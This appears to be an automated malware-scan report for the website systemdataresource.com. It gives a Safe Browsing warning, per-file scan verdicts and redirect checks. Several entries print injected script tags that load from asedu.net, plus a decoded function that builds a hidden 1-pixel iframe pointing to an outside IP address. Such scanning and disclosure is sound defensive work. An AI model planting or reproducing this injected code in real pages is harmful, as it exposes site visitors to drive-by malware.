Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=systemdataresource.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://systemdataresource.com/ | 200 OK Content-Length: 11637 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.asedu.net/eNefmel6.php?id=2637747"></script> | ||
http://systemdataresource.com/incl/sniffer.js | 200 OK Content-Length: 12114 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: 101.110.168.104 var menuReadyState=0;var exclude=1; var agt=navigator.userAgent.toLowerCase();var win=0;var mac=0;var lin=1;if(agt.indexOf('win')!=-1){win=1;lin=0;}if(agt.indexOf('mac')!=-1){mac=1;lin=0;}var lnx=0;if(lin){lnx=1;}var ice=0;var ie=0;var ie4=0;var ie5=0;var ie6=0;var com=0;var dcm;var op5=0;var op6=0;var op7=0;var ns4=0;var ns6=0;var ns7=0;var mz7=0;var kde=0;var saf=0;if(typeof navigator.vendor!="undefined"){if (navigator.vendor=="KDE"){var thisKD ...[3601 bytes skipped]... Decoded script: String String function zzzfff() { var iuzq = document.createElement('iframe'); iuzq.src = 'http://101.110.168.104/8pPtHKXF.php'; iuzq.style.position = 'absolute'; iuzq.style.border = '0'; iuzq.style.height = '1px'; iuzq.style.width = '1px'; iuzq.style.left = '1px'; iuzq.style.top = '1px'; if (!document.getElementById('iuzq')) { document.write('<div id=\'iuzq\'></div>'); document.getElementById('iuzq').appendChild(iuzq); } } function SetCookie(cookieName,cookieVal ...[2498 bytes skipped]... | ||
http://systemdataresource.com/incl/custom.js | 200 OK Content-Length: 9982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!exclude) {
var menuALIGN = "virtual"; var absLEFT = 320; var absTOP = 19; var staticMENU = false; var stretchMENU = false; var showBORDERS = false; var baseHREF = "http://www.systemdataresource.com/incl/"; var zORDER = 1000; var mCOLOR = "#FFFFFF"; var rCOLOR = ""; var bSIZE = 0; var bCOLOR = ""; var aLINK = "#A593B2"; var aHOVER = "#A3A2A3"; var aDEC = "none"; var fFONT = Antivirus reports:
| ||
http://systemdataresource.com/incl/style.js | 200 OK Content-Length: 8328 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var lineHeightSwitch=false; if(!exclude){var d=document;var mrSize,srSize;if(typeof fSIZE=="number"){mrSize=fSIZE+"px";}else {if(fSIZE=="x-small"){mrSize="xx-small";if(com){mrSize="x-small";}fSIZE=10;}else if(fSIZE=="small") {mrSize="x-small";if(com){mrSize="small";}fSIZE=13;}else if(fSIZE=="medium"){mrSize="small";if(com){mrSize="medium";}fSIZE=16;}else if(fSIZE=="large"){mrSize="medium";if(com){mrSize="large";}fSIZE=19;}else if(fSIZE=="x-large"){mrSize="large";if(com){mrSize="x-larg Antivirus reports:
| ||
http://systemdataresource.com/incl/menu.js | 200 OK Content-Length: 5556 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var tempEl;function getRealLeft(imgElem){if(ns4){xPos=imgElem.x;}else if(!exclude){xPos=eval(imgElem).offsetLeft;tempEl=eval(imgElem).offsetParent;while(tempEl!=null){xPos+=tempEl.offsetLeft;tempEl=tempEl.offsetParent;}}if(mac&&ie5){xPos+=parseInt(document.body.leftMargin);}return xPos;};function getRealTop(imgElem){if(ns4){yPos=imgElem.y;}else if(!exclude){yPos=eval(imgElem).offsetTop;tempEl=eval(imgElem).offsetParent;while(tempEl!=null){yPos+=tempEl.offsetTop;tempEl=tempEl.offset Antivirus reports:
| ||
http://systemdataresource.com/company/index.htm | 200 OK Content-Length: 8609 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.asedu.net/eNefmel6.php?id=2637759"></script> | ||
http://systemdataresource.com/company/../incl/sniffer.js | 200 OK Content-Length: 12114 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: 101.110.168.104 var menuReadyState=0;var exclude=1; var agt=navigator.userAgent.toLowerCase();var win=0;var mac=0;var lin=1;if(agt.indexOf('win')!=-1){win=1;lin=0;}if(agt.indexOf('mac')!=-1){mac=1;lin=0;}var lnx=0;if(lin){lnx=1;}var ice=0;var ie=0;var ie4=0;var ie5=0;var ie6=0;var com=0;var dcm;var op5=0;var op6=0;var op7=0;var ns4=0;var ns6=0;var ns7=0;var mz7=0;var kde=0;var saf=0;if(typeof navigator.vendor!="undefined"){if (navigator.vendor=="KDE"){var thisKD ...[3601 bytes skipped]... Decoded script: String String function zzzfff() { var iuzq = document.createElement('iframe'); iuzq.src = 'http://101.110.168.104/8pPtHKXF.php'; iuzq.style.position = 'absolute'; iuzq.style.border = '0'; iuzq.style.height = '1px'; iuzq.style.width = '1px'; iuzq.style.left = '1px'; iuzq.style.top = '1px'; if (!document.getElementById('iuzq')) { document.write('<div id=\'iuzq\'></div>'); document.getElementById('iuzq').appendChild(iuzq); } } function SetCookie(cookieName,cookieVal ...[2498 bytes skipped]... | ||
http://systemdataresource.com/company/../incl/custom.js | 200 OK Content-Length: 9982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!exclude) {
var menuALIGN = "virtual"; var absLEFT = 320; var absTOP = 19; var staticMENU = false; var stretchMENU = false; var showBORDERS = false; var baseHREF = "http://www.systemdataresource.com/incl/"; var zORDER = 1000; var mCOLOR = "#FFFFFF"; var rCOLOR = ""; var bSIZE = 0; var bCOLOR = ""; var aLINK = "#A593B2"; var aHOVER = "#A3A2A3"; var aDEC = "none"; var fFONT = Antivirus reports:
| ||
http://systemdataresource.com/company/../incl/style.js | 200 OK Content-Length: 8328 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var lineHeightSwitch=false; if(!exclude){var d=document;var mrSize,srSize;if(typeof fSIZE=="number"){mrSize=fSIZE+"px";}else {if(fSIZE=="x-small"){mrSize="xx-small";if(com){mrSize="x-small";}fSIZE=10;}else if(fSIZE=="small") {mrSize="x-small";if(com){mrSize="small";}fSIZE=13;}else if(fSIZE=="medium"){mrSize="small";if(com){mrSize="medium";}fSIZE=16;}else if(fSIZE=="large"){mrSize="medium";if(com){mrSize="large";}fSIZE=19;}else if(fSIZE=="x-large"){mrSize="large";if(com){mrSize="x-larg Antivirus reports:
| ||
http://systemdataresource.com/company/../incl/menu.js | 200 OK Content-Length: 5556 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var tempEl;function getRealLeft(imgElem){if(ns4){xPos=imgElem.x;}else if(!exclude){xPos=eval(imgElem).offsetLeft;tempEl=eval(imgElem).offsetParent;while(tempEl!=null){xPos+=tempEl.offsetLeft;tempEl=tempEl.offsetParent;}}if(mac&&ie5){xPos+=parseInt(document.body.leftMargin);}return xPos;};function getRealTop(imgElem){if(ns4){yPos=imgElem.y;}else if(!exclude){yPos=eval(imgElem).offsetTop;tempEl=eval(imgElem).offsetParent;while(tempEl!=null){yPos+=tempEl.offsetTop;tempEl=tempEl.offset Antivirus reports:
| ||
http://systemdataresource.com/company/../solutions/software.htm | 200 OK Content-Length: 11994 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.asedu.net/eNefmel6.php?id=2637781"></script> | ||
http://systemdataresource.com/company/../solutions/../incl/sniffer.js | 200 OK Content-Length: 12114 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: 101.110.168.104 var menuReadyState=0;var exclude=1; var agt=navigator.userAgent.toLowerCase();var win=0;var mac=0;var lin=1;if(agt.indexOf('win')!=-1){win=1;lin=0;}if(agt.indexOf('mac')!=-1){mac=1;lin=0;}var lnx=0;if(lin){lnx=1;}var ice=0;var ie=0;var ie4=0;var ie5=0;var ie6=0;var com=0;var dcm;var op5=0;var op6=0;var op7=0;var ns4=0;var ns6=0;var ns7=0;var mz7=0;var kde=0;var saf=0;if(typeof navigator.vendor!="undefined"){if (navigator.vendor=="KDE"){var thisKD ...[3601 bytes skipped]... Decoded script: String String function zzzfff() { var iuzq = document.createElement('iframe'); iuzq.src = 'http://101.110.168.104/8pPtHKXF.php'; iuzq.style.position = 'absolute'; iuzq.style.border = '0'; iuzq.style.height = '1px'; iuzq.style.width = '1px'; iuzq.style.left = '1px'; iuzq.style.top = '1px'; if (!document.getElementById('iuzq')) { document.write('<div id=\'iuzq\'></div>'); document.getElementById('iuzq').appendChild(iuzq); } } function SetCookie(cookieName,cookieVal ...[2498 bytes skipped]... | ||
http://systemdataresource.com/company/../solutions/../incl/custom.js | 200 OK Content-Length: 9982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!exclude) {
var menuALIGN = "virtual"; var absLEFT = 320; var absTOP = 19; var staticMENU = false; var stretchMENU = false; var showBORDERS = false; var baseHREF = "http://www.systemdataresource.com/incl/"; var zORDER = 1000; var mCOLOR = "#FFFFFF"; var rCOLOR = ""; var bSIZE = 0; var bCOLOR = ""; var aLINK = "#A593B2"; var aHOVER = "#A3A2A3"; var aDEC = "none"; var fFONT = Antivirus reports:
| ||
http://systemdataresource.com/company/../solutions/../incl/style.js | 200 OK Content-Length: 8328 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var lineHeightSwitch=false; if(!exclude){var d=document;var mrSize,srSize;if(typeof fSIZE=="number"){mrSize=fSIZE+"px";}else {if(fSIZE=="x-small"){mrSize="xx-small";if(com){mrSize="x-small";}fSIZE=10;}else if(fSIZE=="small") {mrSize="x-small";if(com){mrSize="small";}fSIZE=13;}else if(fSIZE=="medium"){mrSize="small";if(com){mrSize="medium";}fSIZE=16;}else if(fSIZE=="large"){mrSize="medium";if(com){mrSize="large";}fSIZE=19;}else if(fSIZE=="x-large"){mrSize="large";if(com){mrSize="x-larg Antivirus reports:
| ||
http://systemdataresource.com/company/../solutions/../incl/menu.js | 200 OK Content-Length: 5556 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var tempEl;function getRealLeft(imgElem){if(ns4){xPos=imgElem.x;}else if(!exclude){xPos=eval(imgElem).offsetLeft;tempEl=eval(imgElem).offsetParent;while(tempEl!=null){xPos+=tempEl.offsetLeft;tempEl=tempEl.offsetParent;}}if(mac&&ie5){xPos+=parseInt(document.body.leftMargin);}return xPos;};function getRealTop(imgElem){if(ns4){yPos=imgElem.y;}else if(!exclude){yPos=eval(imgElem).offsetTop;tempEl=eval(imgElem).offsetParent;while(tempEl!=null){yPos+=tempEl.offsetTop;tempEl=tempEl.offset Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: systemdataresource.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 07:03:14 GMT
Accept-Ranges: bytes
ETag: "2d75-4f7865d7ff887"
Server: Apache
Content-Length: 11637
Content-Type: text/html
Last-Modified: Mon, 21 Apr 2014 04:59:33 GMT
...11637 bytes of data.
GET / HTTP/1.1
Host: systemdataresource.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 07:03:14 GMT
Accept-Ranges: bytes
ETag: "2d75-4f7865d7ff887"
Server: Apache
Content-Length: 11637
Content-Type: text/html
Last-Modified: Mon, 21 Apr 2014 04:59:33 GMT
...11637 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: systemdataresource.com
Referer: http://www.google.com/search?q=systemdataresource.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: systemdataresource.com
Referer: http://www.google.com/search?q=systemdataresource.com
Result:
The result is similar to the first query. There are no suspicious redirects found.